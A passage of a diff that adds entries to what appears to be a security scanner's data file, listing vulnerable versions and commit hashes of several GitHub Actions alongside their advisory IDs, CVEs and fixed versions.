["tj-actions/changed-files", "v9.3", "2a771ad30d623c27165b3677688ebe3f17c49f65", "41"] + - ["tj-actions/changed-files", "v9.2", "75933dc40b241db3752ed4c9e2f24cb7cfff51f9", "41"] + - ["tj-actions/changed-files", "v9.1", "2c0d12b627191145ce31c2a098d8d37e93b35861", "41"] + - ["tj-actions/changed-files", "v9", "7abdbc94e90b9a9b002ad86d8d2a5f9472c3c75c", "41"] + - ["tj-actions/changed-files", "v8.9", "675ab58887b9ae58d77d4dcd2d5e58228ab5f185", "41"] + - ["tj-actions/changed-files", "v8.8", "8c6f276ea5961fa51474aaa203c6d06226acbaa8", "41"] + - ["tj-actions/changed-files", "v8.7", "d825b1f7094e756ca34581aaab611003eaa23975", "41"] + - ["tj-actions/changed-files", "v8.6", "0bd70b7aecded5f2eb1f0498c3692433f2453b37", "41"] + - ["tj-actions/changed-files", "v8.5", "0fe67a1f15b48dcd40e7ea0dfdd4afc9418febf0", "41"] + - ["tj-actions/changed-files", "v8.4", "7bfa539f0d6ed4331d2899e7440a1946929829c1", "41"] + - ["tj-actions/changed-files", "v8.3", "d679de9200b28e963362cba99095dd8d9f23d446", "41"] + - ["tj-actions/changed-files", "v8.2", "1e10ed49507767257514a643ca1baab24a5496af", "41"] + - ["tj-actions/changed-files", "v8.1", "0754fdabe31b721683e1ffc719584df67ad24c87", "41"] + - ["tj-actions/changed-files", "v8", "d290bdd91e68dcf1bafe3fa63280666077cbc61c", "41"] + - ["tj-actions/changed-files", "v7", "15b1769fc52da64fe168a41ccb01c48b27687149", "41"] + - ["tj-actions/changed-files", "v6.3", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v6.2", "5fe8e4d60450bbe483ca011b747c4a972a79ef07", "41"] + - ["tj-actions/changed-files", "v6.1", "7c66aa285d3ec22f1b8442b9a498ebb76ca5f57b", "41"] + - ["tj-actions/changed-files", "v6", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v5.3", "e95bba87d2bd0b2bab4094abd9755a74f16703e6", "41"] + - ["tj-actions/changed-files", "v5.2", "7852058eeee10d857e59ce41f3cb465a70c96ae0", "41"] + - ["tj-actions/changed-files", "v5.1", "81f32e24026825ecfb7cb5d3951f91cfe788b0ad", "41"] + - ["tj-actions/changed-files", "v5.0.0", "450eadf5a0462f8d0b5e99d07d4b6d8f7358420c", "41"] + - ["tj-actions/changed-files", "v5", "0e956bb09e9b05df440a2459a041cdec3cc0cc0c", "41"] + - ["tj-actions/changed-files", "v4.4", "300e935beb285fcda513be84333e8726d5a544fb", "41"] + - ["tj-actions/changed-files", "v4.3", "fcb2ab8c32c2b66fdf94ab3deede353f8fe6f77c", "41"] + - ["tj-actions/changed-files", "v4.2", "271bbd60fedbc83dbb8cb00ce88bb4532d940e2f", "41"] + - ["tj-actions/changed-files", "v4.1", "e8ace0110cd60a2a0a729d52078ad6cec839dbb9", "41"] + - ["tj-actions/changed-files", "v4.0.7", "473984bd85c24f1fe61c0494d317cc7d490e1235", "41"] + - ["tj-actions/changed-files", "v4.0.6", "032f37fd241eeaf66ead8120552a3c6a157d1f22", "41"] + - ["tj-actions/changed-files", "v4.0.5", "3a35bdf667b36191faf1eea2b8c2cfbb8890bd25", "41"] + - ["tj-actions/changed-files", "v4.0.4", "c2216f65fdd828a28c41d6c97d242ec39ed694f3", "41"] + - ["tj-actions/changed-files", "v4.0.3", "0f16c26f3d5699a26be12446509c537ee964c1a8", "41"] + - ["tj-actions/changed-files", "v4.0.2", "271468ecafc0c12c5f0ce364317a640a5668eba7", "41"] + - ["tj-actions/changed-files", "v4.0.1", "fb063fc7d459d8ee25f9b3ed48ec83bc5c51df72", "41"] + - ["tj-actions/changed-files", "v4.0.0", "a05436ffa9505d25707f781260a99d01cebd0d13", "41"] + - ["tj-actions/changed-files", "v4", "c061ef1fa3d028267a34edff2d42a34c8d56ec53", "41"] + - ["tj-actions/changed-files", "v3.3", "489e2d514f3a230d66dbf74efec7ceed7b171703", "41"] + - ["tj-actions/changed-files", "v3.2", "8d5a33c6034b0991a3fe85b2e73012a689eadf92", "41"] + - ["tj-actions/changed-files", "v3.1", "fbfaba544e2ae235b2f88c936bcd5f8aa12419cc", "41"] + - ["tj-actions/changed-files", "v3.0.2", "1980f551b48196e1d8aa48fbfd924cedde0d3e13", "41"] + - ["tj-actions/changed-files", "v3.0.1", "a86b5608ded2e43fee87cbbde6394e0be7f46a41", "41"] + - ["tj-actions/changed-files", "v3.0.0", "f917cc3459f79321da6af2a153cb91ce82a34aaf", "41"] + - ["tj-actions/changed-files", "v3", "e18ccae8fe477263087493451ea812d4d36faa4e", "41"] + - ["tj-actions/changed-files", "v2.1", "e1d275d6d3255d6a586052675d3c5cef793edccf", "41"] + - ["tj-actions/changed-files", "v2.0.1", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v2.0.0", "9c1a181e67797cd053d15062eda07b2b322bbbfe", "41"] + - ["tj-actions/changed-files", "v2", "5eaa2d80dddfe7de6f7cc75fcaeb554851737685", "41"] + - ["tj-actions/changed-files", "v1.3.1", "188487d180e816622215bd011cbaca666af41ed9", "41"] + - ["tj-actions/changed-files", "v1.3.0", "30988915fa46789ba51cc1436c92488a52ac44ee", "41"] + - ["tj-actions/changed-files", "v1.2.2", "467d26c8b77612d9f7d20df5271edc207eae69a7", "41"] + - ["tj-actions/changed-files", "v1.2.1", "d9eb683b30e5b231c948331ad364b991fa8be544", "41"] + - ["tj-actions/changed-files", "v1.2.0", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v1.1.3", "8e7cc77ab9c1bffc233f2f3023d1b89ed44c9af5", "41"] + - ["tj-actions/changed-files", "v1.1.2", "81ad4b874479c31a00285815995079e20c6c2779", "41"] + - ["tj-actions/changed-files", "v1.1.1", "5e2a2f192377df7d67537b0e788e1b53e8a76f12", "41"] + - ["tj-actions/changed-files", "v1.1.0", "1af9ab38306a2fa478c9772eabab167444dbc755", "41"] + - ["tj-actions/changed-files", "v1.0.3", "55a857d66a8e01f50a2a37d18239edde79b1668d", "41"] + - ["tj-actions/changed-files", "v1.0.2", "62a9200adfe8200623dcd28ca74973e82baa954c", "41"] + - ["tj-actions/changed-files", "v1.0.1", "b915d091052b9d35e7c200d1da10cc6e2ec266e2", "41"] + - ["tj-actions/changed-files", "v1.0.0", "f0751de6af436d4e79016e2041cf6400e0833653", "41"] + - ["tj-actions/changed-files", "v1", "eef94236f6b9dec768f89dc72b9e0b64e13bb36e", "41"] + + # tj-actions/verify-changed-files + # https://github.com/advisories/GHSA-ghm2-rq8q-wrhc + # CVE-2023-52137 + - ["tj-actions/verify-changed-files", "v16.1.1", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v16.1.0", "a9b6fd340565065ad293625200630be7fd2b0f13", "17"] + - ["tj-actions/verify-changed-files", "v16.0.1", "30aa174f53f67ecd5dc8e190dfbe46392202e5a5", "17"] + - ["tj-actions/verify-changed-files", "v16.0.0", "7f1b21ceb7ef533b97b46e89e2f882ee5cb17ae0", "17"] + - ["tj-actions/verify-changed-files", "v16", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v15.0.2", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v15.0.1", "7da22d0521c254e711e5988bd2c7d48c2948d137", "17"] + - ["tj-actions/verify-changed-files", "v15.0.0", "7016858e130743cc6c6b472849411d40aa8ae1ce", "17"] + - ["tj-actions/verify-changed-files", "v15", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v14.0.2", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v14.0.1", "bad2f5d7fc7e6812ac48d7e7207025a5a4cc93d3", "17"] + - ["tj-actions/verify-changed-files", "v14.0.0", "3b573ace62e287c3d68e24e4de2ee0c6f6280d86", "17"] + - ["tj-actions/verify-changed-files", "v14", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v13.2.0", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v13.1", "9ed3155b72ba709881c967f75611fc5852f773b9", "17"] + - ["tj-actions/verify-changed-files", "v13", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v12.0", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v12", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v11.1", "1d7ee9711b0a8f675208004e66bc25d593a1a0ae", "17"] + - ["tj-actions/verify-changed-files", "v11", "c4322970b4f055ede155b95586b04562796f83b7", "17"] + - ["tj-actions/verify-changed-files", "v10.1", "6e986dfff1f61105bc496287b5bbf0776092737e", "17"] + - ["tj-actions/verify-changed-files", "v10", "fa6ea307b32e5314d4a62b1209c3c782d5b5dcc9", "17"] + - ["tj-actions/verify-changed-files", "v9.2", "6f40ee1d523d9a9223204ae06919a3b2739702dc", "17"] + - ["tj-actions/verify-changed-files", "v9.1", "1b13d2556290c5ca5a94b7d042b91f3519c17d38", "17"] + - ["tj-actions/verify-changed-files", "v9", "c09bcad97929b17bacf737670bee312af98be94f", "17"] + - ["tj-actions/verify-changed-files", "v8.8", "fda469d6b456070da68fa3fdbc07a513d858b200", "17"] + - ["tj-actions/verify-changed-files", "v8.7", "bd1e271a8d26e249e0412899d4e3d8f5a89ecd6c", "17"] + - ["tj-actions/verify-changed-files", "v8.6", "367ba21c800e2a2b1451e272d24cf0caa3e4f9e4", "17"] + - ["tj-actions/verify-changed-files", "v8.5", "9dea97ec0f35d708d32dadd9b34a6af7cc28b19f", "17"] + - ["tj-actions/verify-changed-files", "v8.4", "c154cc6a77695d4483937745499e07fee62addd3", "17"] + - ["tj-actions/verify-changed-files", "v8.3", "527ff7533afca6e5bece96bd15a998f90f54c624", "17"] + - ["tj-actions/verify-changed-files", "v8.2", "e8756d59f6d66ad7376c293832e4d6eda8ae3257", "17"] + - ["tj-actions/verify-changed-files", "v8.1", "bcb4e766c132157cda3d1e8c7ca3d68d86d6ae6b", "17"] + - ["tj-actions/verify-changed-files", "v8", "25267f57f3afa6c59f1495e52da8b08c2c586606", "17"] + - ["tj-actions/verify-changed-files", "v7.2", "ea24bfd8ba4b019cb321502a4382a7a44b6ebc01", "17"] + - ["tj-actions/verify-changed-files", "v7.1", "f2a40baded88e47fa3f8e0f614832835194f4904", "17"] + - ["tj-actions/verify-changed-files", "v7", "197e12135dd5eaedd520a27882d17c1f384cf6a0", "17"] + - ["tj-actions/verify-changed-files", "v6.2", "a8f1b11a7c4dfc6706d8c64416dda0ef85d06e77", "17"] + - ["tj-actions/verify-changed-files", "v6.1", "95c26dda77430743cb3542d24b3e739417f5a881", "17"] + - ["tj-actions/verify-changed-files", "v6", "97ba4ccf1285bdfca165bc0b0a7cb1f994dae04e", "17"] + - ["tj-actions/verify-changed-files", "v5.7", "68310bb8f2a087df9f6ab1a2cc07c1e7cfc8ea28", "17"] + - ["tj-actions/verify-changed-files", "v5.6", "720ba6a5776e8687117603acab16000c0fc8868b", "17"] + - ["tj-actions/verify-changed-files", "v5.5", "cedd7096b7f23ae0307d7d82f516d666580579b3", "17"] + - ["tj-actions/verify-changed-files", "v5.4", "d68d3d232ffbba653ab0227d4bb2001cda681d12", "17"] + - ["tj-actions/verify-changed-files", "v5.3", "2e1153b8d1546dea7cd1a9db9834daceb72af17a", "17"] + - ["tj-actions/verify-changed-files", "v5.2", "c3dd6355e363eab778c129867f91da02e3285961", "17"] + - ["tj-actions/verify-changed-files", "v5.1", "81bd1de29366c53364b43cf83c4a4ddcab53b571", "17"] + - ["tj-actions/verify-changed-files", "v5", "31a9c7487cc1096253faa121489f4dbb32ca4132", "17"] + - ["tj-actions/verify-changed-files", "v4", "e981d37638f538ab477279c9f1fb6048462fd161", "17"] + - ["tj-actions/verify-changed-files", "v3.0.4", "e7f801cef44ca52e9aa496526dcd71daf5ef8437", "17"] + - ["tj-actions/verify-changed-files", "v3.0.3", "e86d0b9d1805c4e84fc90d4bcdab7371e14173d2", "17"] + - ["tj-actions/verify-changed-files", "v3.0.2", "ad255a4b81fa69c78f5fd1bb8ac95739dd3a9580", "17"] + - ["tj-actions/verify-changed-files", "v3.0.1", "3a8aed1f8847cc121e5f08e8963755154bb9df9e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.gamma", "de910b5a2cdd6814c6e41d2b7c6f678eb75d430a", "17"] + - ["tj-actions/verify-changed-files", "v3.0.g", "d31b2a1fd119abbeddd18df3d95001a141b37372", "17"] + - ["tj-actions/verify-changed-files", "v3.0.beta", "e61c6fc5323423d2f0d9f04c7d15fa52af1084b0", "17"] + - ["tj-actions/verify-changed-files", "v3.0.b", "380890dc80695b7aa8047c0f824f87234defabd7", "17"] + - ["tj-actions/verify-changed-files", "v3.0.alpha", "873cfd676aea5e2a04b3f16706bd590effb5023e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.a", "b0c60c86ab292cabeb4b4dc9f34c296c314fdfbb", "17"] + - ["tj-actions/verify-changed-files", "v3", "71831832d68f9fa5b527a9d692df35e1626ddfa2", "17"] + - ["tj-actions/verify-changed-files", "v2.0a", "6555389afba06cce81bc2f57a191d54f380ece0a", "17"] + - ["tj-actions/verify-changed-files", "v2", "9828a95864031bd113695ad5c68944163008d861", "17"] + - ["tj-actions/verify-changed-files", "v1.0.1", "8150cee7a747364d6b113cf8b0f59af88453a161", "17"] + - ["tj-actions/verify-changed-files", "v1", "48ddf88305af39076d425f86f0617d6f7ff23d58", "17"] + + # tj-actions/branch-names + # https://github.com/advisories/GHSA-8v8w-v8xg-79rf + # CVE-2023-49291 + - ["tj-actions/branch-names", "v7.0.6", "ab304d8562e2f137165e1d930e6d22d431189074", "7.07"] + - ["tj-actions/branch-names", "v7.0.5", "033f2358d95522973eee35810e35a86fae4a71d8", "7.07"] + - ["tj-actions/branch-names", "v7.0.4", "f7cfbc8edeb70a87ebec52e94fa8366f5077d0bc", "7.07"] + - ["tj-actions/branch-names", "v7.0.3", "309671a59e1143038c2a50f009b6adf301f6aa71", "7.07"] + - ["tj-actions/branch-names", "v7.0.2", "636cfe47b2002897ee4d3f07792c9fdd5d7dc725", "7.07"] + - ["tj-actions/branch-names", "v7.0.1", "4e532392367d7e4fb2f494f2d50c47562660cce5", "7.07"] + - ["tj-actions/branch-names", "v7.0.0", "604fda4f4254216e3b564d60fe27d68017756558", "7.07"] + - ["tj-actions/branch-names", "v6.5", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v6.4", "eee8675bd61ec38bcfbfedd504d8473292ba649e", "7.07"] + - ["tj-actions/branch-names", "v6.3", "a594c1e96eab7790611fdaf5bc8f76ea55cedabd", "7.07"] + - ["tj-actions/branch-names", "v6.2", "b90df97be1c548ac9c8bd9186bfea6747153bf5e", "7.07"] + - ["tj-actions/branch-names", "v6.1", "09ab61130975078eb7cde103fe8d2ae1649a1853", "7.07"] + - ["tj-actions/branch-names", "v6", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v5.6", "63b65253bc9542d36a60646299bd8c9af6d9ce7e", "7.07"] + - ["tj-actions/branch-names", "v5.5", "a704b89383028b5df2a4fd0b9fac9711970f18be", "7.07"] + - ["tj-actions/branch-names", "v5.4", "b0f914ba0e7aa1e243b53df97447f71eb57da09a", "7.07"] + - ["tj-actions/branch-names", "v5.3", "e0e3be64a3f10f671bb526b715f86a8a834dce75", "7.07"] + - ["tj-actions/branch-names", "v5.2", "9cd06d955f4184031cd71fbb1717ac268ade2ee0", "7.07"] + - ["tj-actions/branch-names", "v5.1", "b99758d88d96a27ee98b444451c1602a4507d243", "7.07"] + - ["tj-actions/branch-names", "v5", "dc2e78ac9284175fdc0f2d505d8b49ef99632ea8", "7.07"] + - ["tj-actions/branch-names", "v4.9", "12c1d475292ae9bb96656e80c24172db3cd60ffb", "7.07"] + - ["tj-actions/branch-names", "v4.8", "af5c6741e639608a1c0e87eaa3c0c414d427d9e4", "7.07"] + - ["tj-actions/branch-names", "v4.7", "28a6a95bc5bcc69b16010647668f1c5c4fd0dcca", "7.07"] + - ["tj-actions/branch-names", "v4.6", "b0fc3aebc2f3fb8edfd024aea4dc8a073d10db88", "7.07"] + - ["tj-actions/branch-names", "v4.5", "a0061fbc59329b02d6c530f25b9d3fc80340a792", "7.07"] + - ["tj-actions/branch-names", "v4.4", "ce1737e426445fcb5b05a09e984b66d0b27548ba", "7.07"] + - ["tj-actions/branch-names", "v4.3", "47910e48331f8d64a4d535a35e9540c1ebf767f7", "7.07"] + - ["tj-actions/branch-names", "v4.2", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v4.1", "98c04d51ee204c4f23daee8ee15af9e8e80e36b2", "7.07"] + - ["tj-actions/branch-names", "v4", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v3.6", "3e0215fc2dd14b3e395f99b5e2cc1e4d93afe1b6", "7.07"] + - ["tj-actions/branch-names", "v3.5", "b587231a9abec0da6f45dbaea42d88a9c130ee8f", "7.07"] + - ["tj-actions/branch-names", "v3.4", "dd9939e9966a18c8ce9bfcf188731c4746faf197", "7.07"] + - ["tj-actions/branch-names", "v3.3", "509c3124abef4caaeb784a5aa6f465da588e0c43", "7.07"] + - ["tj-actions/branch-names", "v3.2", "ae7cf1163ab1375b4bbf5ec6d16a686118dac27d", "7.07"] + - ["tj-actions/branch-names", "v3.1", "eb14b2dffd7af08b599b691d72b757ae607675bd", "7.07"] + - ["tj-actions/branch-names", "v3", "fdb3a42221b1ee981def2a3e7767bd3ffcda0ff7", "7.07"] + - ["tj-actions/branch-names", "v2.2", "4362da73333d3a6ecf81047f6ae055cad78fcb38", "7.07"] + - ["tj-actions/branch-names", "v2.1", "8c72ffde4df03225c479f93fef608d8cdd1042f3", "7.07"] + - ["tj-actions/branch-names", "v2", "8307330ac59a26bd125a6f99c33820dd0baf439f", "7.07"] + - ["tj-actions/branch-names", "v1", "549ca323b2179ffc0f7f828b555e88fe53da3787", "7.07"] + + # gradle/gradle-build-action + # https://github.com/advisories/GHSA-h3qr-39j9-4r5v + # CVE-2023-30853 + - ["gradle/gradle-build-action", "v2.4.1", "5056fa9d50478a14af3c9925c12ca02318659d3e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.4.0", "6095a76664413da4c8c134ee32e8a8ae900f0f1f", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.3", "3fbe033aaae657f011f88f29be9e65ed26bd29ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.2", "fd32ae908111fe31afa48827bd1ee909540aa971", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.1", "c295a4096e1d2c453eaf1f65c6f96686e26bd8be", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0", "356abb47e7664b5505e25d7997a5a522a17c62d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0-beta.1", "d427a379a8cc30e1c773080ce783e7e6d5167584", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.5", "cd579d970f8aec1cf0cae5f62a8e418768970015", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.4", "bf2a15ee94874758c21b91220b4d0ab84f762423", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.3", "9411346324b44f5402cbef3ac5a83a411086aa9a", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.2", "cd3cedc781988c804f626f4cd2dc51d0bdf02a12", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.1", "67421db6bd0bf253fb4bd25b31ebb98943c375e1", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0", "e88ed3e650b26bd116cfee53cf198c1f6856682d", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.2", "de51428ba55149e7c6f6957a566b8759efd425de", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.1", "63bcd47c1be270a660a151ce2b7848b8730f06ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-beta.1", "26ea4afa082ddf7e3e5bcf6d12283111b6f3f837", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.7", "9b814496b50909128c6a52622b416c5ffa04db49", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.6", "116ac10f8131939c7e405884cb2456067b0479e9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.5", "fec4a42eb0c83154e5c9590748ba8337949c5701", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.4", "0d13054264b0bb894ded474f08ebb30921341cee", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.3", "937999e9cc2425eddc7fd62d1053baf041147db7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.2", "bc3340afc5e3cc44f2321809ac090d731c13c514", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.1", "b9c806c75d3cb8998f905077e62bb670e7fa7e02", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.0", "3edb3cb004617998d8cf56fe2ebf9d59602e713e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.1", "996094e8e808208e5738e8413b3f55d24d1c1eb7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.0", "4137be6a8bf7d7133955359dbd952c0ca73b1021", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.3", "4e899835b3bddb7d01d3a988e6c53d67ec8a76e2", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.2", "2a57ddf74a257b005f65f70cbf15e8e7f06292d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.1", "db2b34260fe57577fec47305e78a20755eef0441", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.7", "cba1833ddecbbee649950c284416981928631008", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.6", "a94b9252d5d8ca83eed3f76a856f2ba046b1b3c6", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.5", "263f84178a82449371326ba2c1d781bc4b4bb9ac", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.4", "29894757f3fd1d4752e4efadb74896d39873a0ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.3", "c000a0b58fe0ad402c613a864ea3ed26d6e88fd0", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.2", "21dee7159020ab3140bebfd2280a6f34ef4e08ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.1", "bebb162342333983b660d21f31c90f33950f5023", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.0", "e0c2736e35d366e96bb202d1af817db9d562da2f", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.1", "3f3947669a3fe6883ed8dab14671bdc6042ec2d9", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.0", "579711fd3cd8691fbc0cab64db65e9c1e586658e", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.3", "90ccf054e6b9905f30f98c938bce4c6acd323b6b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.2", "c6b57b9c8c4f72268b10f151623ce6a2855c6387", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.1", "791b98c5656178712736d390e91be71eadfe192e", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.0", "27da3e28b3c4cc84c9e7965dc2371f969e582049", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.1", "e220e54c83b8f1a546d8e6d598490231fe2bf64b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.0", "720051268d4728af6b7e0defa8ed8097b20ef218", "2.4.2"] + - ["gradle/gradle-build-action", "v1.1.0", "d0c5f7955e911444399df5d044916a49bdccff00", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.2", "064f85c1568a6fd57b32d8f98c0dc9f237c59156", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.1", "6170f06e8dd334a7f6879781c2ed4889c4cc76bf", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.0", "2d5ca45eab01ff2ce82777ab670ff2bd5d8cf8d5", "2.4.2"] + - ["gradle/gradle-build-action", "v1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + + # rlespinasse/github-slug-action + # https://github.com/advisories/GHSA-6q4m-7476-932w + # CVE-2023-27581 + - ["rlespinasse/github-slug-action", "v4.4.1", "102b1a064a9b145e56556e22b18b19c624538d94", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.4.0", "a362e5fb42057a3a23a62218b050838f1bacca5d", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.2", "b011e83cf8cb29e22dda828db30586691ae164e4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.1", "00198f89920d4454e37e4b27af2b7a8eba79c530", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.0", "9c3571fd3dba541bfdaebc001482a49a1c1f136a", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.9.0", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.8.0", "4a00c29bc1c0a737315b4200af6c6991bb4ace18", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.1", "5150a26d43ce06608443c66efea46fc6f3c50d38", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.0", "ebfc49c0e9cd081acb7ba0634d8d6a711b4c73cf", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.x", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v2.x", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "v1.1.x", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.4", "33cd7a701db9c2baf4ad705d930ade51a9f25c14", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.3", "1615fcb48b5315152b3733b7bed1a9f5dfada6e3", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.2", "4177734b38a3d59604747bf47e537ccb6bcb9cdf", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.1", "7a3b4c1766ad8e6d23ab37d33417392509ff84e2", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.0", "dbbe21b72b96929fe6e67275c332f43599b31274", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.1.0", "88f3ee8f6f5d1955de92f1fe2fdb301fd40207c6", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.1", "cd9871b66e11e9562e3f72469772fe100be4c95a", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.0", "bd31a9f564f7930eea1ecfc8d0e6aebc4bc3279f", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.1", "1bf76b7bc6ef7dc6ba597ff790f956d9082479d7", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.0", "172fe43594a58b5938e248ec757ada60cdb17e18", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.1", "016823880d193a56b180527cf7ee52f13c3cfe33", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.0", "4060fda2690bcebaabcd86db4fbc8e1c2817c835", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.4.0", "0c099abd978b382cb650281af13913c1905fdd50", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.3.0", "d1880ea5b39f611effb9f3f83f4d35bff34083a6", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.2.0", "c8d8ee50d00177c1e80dd57905fc61f81e437279", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.1.0", "e4699e49fcf890a3172a02c56ba78d867dbb9fd5", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.0.0", "6a873bec5ac11c6d2a11756b8763356da63a8939", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.2.0", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.1", "72cfc4cb1f36c102c48541cb59511a6267e89c95", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.0", "1172ed1802078eb665a55c252fc180138b907c51", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.0.0", "ca9a67fa1f1126b377a9d80dc1ea354284c71d21", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.2.0", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.1", "242e04c2d28ac5db296e5d8203dfd7dc6bcc17a9", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.0", "881085bcae8c3443a89cc9401f3e1c60fb014ed2", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.2", "a35a1a486a260cfd99c5b6f8c6034a2929ba9b3f", "4.4.1"] + - 